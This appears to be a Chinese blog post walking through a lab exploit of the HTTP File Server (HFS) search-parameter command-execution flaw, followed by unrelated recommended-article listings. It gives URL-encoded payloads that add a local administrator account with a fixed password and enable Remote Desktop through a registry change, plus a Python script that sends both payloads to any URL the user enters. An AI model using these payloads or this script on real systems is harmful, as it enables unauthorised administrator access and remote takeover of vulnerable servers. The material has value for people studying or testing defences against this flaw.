python---hfs poc

最新推荐文章于 2024-08-12 21:06:42 发布
最新推荐文章于 2024-08-12 21:06:42 发布
阅读量320 收藏
点赞数
原文链接:https://note.youdao.com/ynoteshare1/index.html?id=87814bb7eaca3b8f38088157d474ba00&type=note
版权

环境准备

window server 2012 (被攻击的机器)

ip 192.168.0.x

存在hfs服务

win 10 (攻击机器)

ip 192.168.0.y

攻击者环境:Python3 requests库

环境部署

window server 2012 上面需要进行安装hfs

0

 

部署好之后,我们在物理机上进行访问的时候,他会有请求的信息

 

攻击机上访问

发现成功访问

 

0

 

漏洞利用:

添加用户:exp

/?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20chaosec%20ZXCzxc123%20/add%20%26%20net%20localgroup%20administrators%20chaosec%20/add.%7D

 

?search==%00{.exec|cmd.exe /c net user chaosec ZXCzxc123 /add %26 net localgroup administrators chaosec /add.}

两个相同

创建的用户不同

0

 

发现创建成功

 

远程桌面端口开启exp

/?search==%00%7B.exec%7Ccmd.exe%20/c%20REG%20ADD%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%22%20%22Server%20/v%20fDenyTSConnections%20/t%20REG_DWORD%20/d%2000000000%20/f.%7D

 

netstat -ano|findstr 3389

0

 

发现开启成功

脚本开发思路

1. 接受输入的漏洞地址

2. 组合漏洞地址并请求

3. 判断漏洞是否利用成功

4. 将利用成功的进行打印

 

 

 

解决安装request库的问题

首先安装pip这个不再演示

在终端命令行中安装request库文件

python38 -m pip install requests

注意:要给python3.8安装这个库

0

 

安装完成之后重启pycharm

0

 

进行编写poc就可以了

验证之前,要把上一步验证的全部都删除或者关闭

 

import requests ##调用requests库 url = input("请输入你要利用的漏洞地址:") ##输入要利用的漏洞url user_add = "?search==%00{.exec|cmd.exe /c net user chaosec ZXCzxc123 /add %26 net localgroup administrators chaosec /add.}" ##添加用户的exp open_3389 = "/?search==%00%7B.exec%7Ccmd.exe%20/c%20REG%20ADD%20HKLM%5CSYSTEM%5CCurrentControlSet%5CControl%5CTerminal%22%20%22Server%20/v%20fDenyTSConnections%20/t%20REG_DWORD%20/d%2000000000%20/f.%7D"##开启端口的exp url_uadd=url+user_add ##将地址和exp合并 url_open3389=url+open_3389 ##同上 def useradd():    ##添加用户函数     code = requests.get(url_uadd).status_code     if code == 200:         print("添加用户成功")     else:         print("添加用户失败") def opne3389():    ##打开端口的函数     code = requests.get(url_open3389).status_code     if code == 200:         print("打开端口成功")     else:         print("打开端口失败") useradd() ##调用函数 opne3389()

 

0

 

利用完成之后

再去靶机上面验证,发现成功

0

 

马冬梅007
关注
python工业自动化_用python自动化仿真HFSS,超简易
weixin_39987120的博客
11-25 1122
python是一款适用性极强的编程语言。一直期待HFSS(三维全波电磁场仿真的行业标准)能有python接口。后知后觉的本人才发现原来HFSS16(2015版本)已经不止支持VB脚本,还增加了python支持,当然它用的是Ironpython,基于.NET,和Cpython还是有一定区别,Numpy和Scipy这些库的使用上可能还存在问题。正好网上有牛人已经写好了使用指南,我就当下搬运工,希望有更...
hfss和python_利用PythonHFSS联合仿真设计一个微带天线!
weixin_39805087的博客
12-04 405
原标题:利用PythonHFSS联合仿真设计一个微带天线!我们知道HFSS是一款电磁仿真商用软件,用其进行天线的设计十分方便。而该软件也预留了可以运行脚本的接口,使用者可以使用脚本对软件进行控制,实现模型的建立、求解等等。由于后期可能会用到联合仿真,而大多数联合仿真的脚本都是使用的Matlab进行编程,网上也有不少现成的api,因为对python比较熟悉,且python除了数值计算其他的功能也相...
渗透测试实战-HFS远程RCE漏洞利用
最新发布
haosha。的博客
08-12 896
渗透测试实战-HFS远程RCE漏洞利用
一句Python代替Http File Server(HFS)
徐璐的专栏
09-17 2997
python -mSimpleHTTPServer恩。Windows, Linux, Mac通用。Darkhttpd,Http File Server之类的可以退休啦。
HFSS-Python二次开发经验分享(硬货)
weixin_42773635的博客
05-13 2954
仿真脚本发展现状 脚本语言相关:由于Python编程语言发展较晚,此前自动化等脚本都是VBA,例如CST/HFSS/AWR/ANSYS/ABAQUS/Excel等软件现在仍保留着这些接口。但是VB的弊端很明显,语法不够简单、灵活性有限。因此可以看到和预料到近年以及后续会有越来越多的软件适配Python接口。(笔者4年前也是感觉有此趋势所以在那个时候就开始学习Python了) 脚本二次开发常见适用领域: CAD二次开发。例如autoCad,Creo等CAD软件。由于目前各行各业使用CAD+CAE的比例越来越高
hfst-python:hfst的python包装器
03-18
包装说明 软件包hfst包含 (赫尔辛基有限状态技术)C ++库的python绑定。 HFST工具包旨在处理自然语言形态。该工具包通过多种形态复杂程度不同的语言的广泛实现而得到证明。 要求 我们在Linux,Mac OS X和Windows的PyPI上提供二进制轮子。 适用于Linux的Wheels使用python版本2.7、3.4、3.5、3.6和3.7的64位docker映像(quay.io/pypa/manylinux1_x86_64)进行编译。也可以使用Debian二进制软件包将hfst安装到Linux(请参见下文)。 Mac的Wheels被编译为python版本2.7、3.5、3.6和3.7的通用二进制文件。 OS X必须为10.7或更高版本。 Windows的Wheel是32位的,并且还需要32位的python才能正常工作。它们可用于python 3.5和3.6版本;早期版
hfs-zh_hans_hfs登录模板_HFS模板_hfs默认模板_hfs配置模板_hfs_
10-02
在提供的压缩包中,"hfs-zh_hans.tpl" 文件就是汉化模板的核心文件。这个文件包含了所有的界面元素、文本和样式规则,替换掉原版HFS中的默认模板文件,即可实现整个界面的汉化。用户只需将此文件复制到HFS的模板目录...
hfs-小工具.rar
04-13
标题中的“hfs-小工具.rar”表明这是一个包含与“hfs”相关的实用程序或软件的压缩文件。从描述和标签中我们也能看到同样的关键词,这提示我们“hfs”可能是一个特定的软件或系统,而这个“小工具”则是为它设计的...
PyPI 官网下载 | hfs-0.4.1-py3-none-any.whl
02-04
"PyPI官网下载 | hfs-0.4.1-py3-none-any.whl"这个标题表明我们正在讨论的是一个可以从PyPI官方源下载的Python软件包。具体来说,这个包名为`hfs`,版本号为`0.4.1`,并且以`.whl`格式提供。 `.whl`文件是Python的...
http共享软件-hfs-wangming
01-13
【标题】"HTTP共享软件-HFS-Wangming" 指的是一个名为HFS(HTTP File Server)的应用程序,由Wangming开发。这个软件主要用于创建个人或临时的HTTP服务器,便于分享文件或者进行测试。 【描述】"可以做http临时站点...
HFS - explorer +v0.21
12-25
HFS Explorer v0.21的压缩包内包含的文件“HFS-explorer v0.21.exe”是软件的可执行文件,用户只需双击运行即可启动程序。在使用过程中,用户可以浏览HFS+分区,查看文件和目录结构,选择性地复制、移动或导出文件,...
HFS修复漏洞版
09-20
HFS修复漏洞版
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
python 之pydhfs 对hdfs 进行操作
qq_29499107的博客
12-29 295
################################################################# ################################################################# ################################################################# #...
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5827
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
huangyongkang666的博客
06-11 3267
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
HFS的远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3297
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 1628
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
Apache OFBiz 路径遍历导致RCE漏洞
weixin_43167326的博客
06-05 668
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞。
佳能数码摄像机hfs20-hfs21hfs200安全使用指南
"佳能数码摄像机hfs20-hfs21-hfs200的中文使用说明书,强调了安全操作和注意事项,包括警告和提示,以及商标声明和相关技术授权信息。" 本文档详细介绍了佳能数码摄像机hfs20、hfs21和hfs200的使用指南,旨在帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值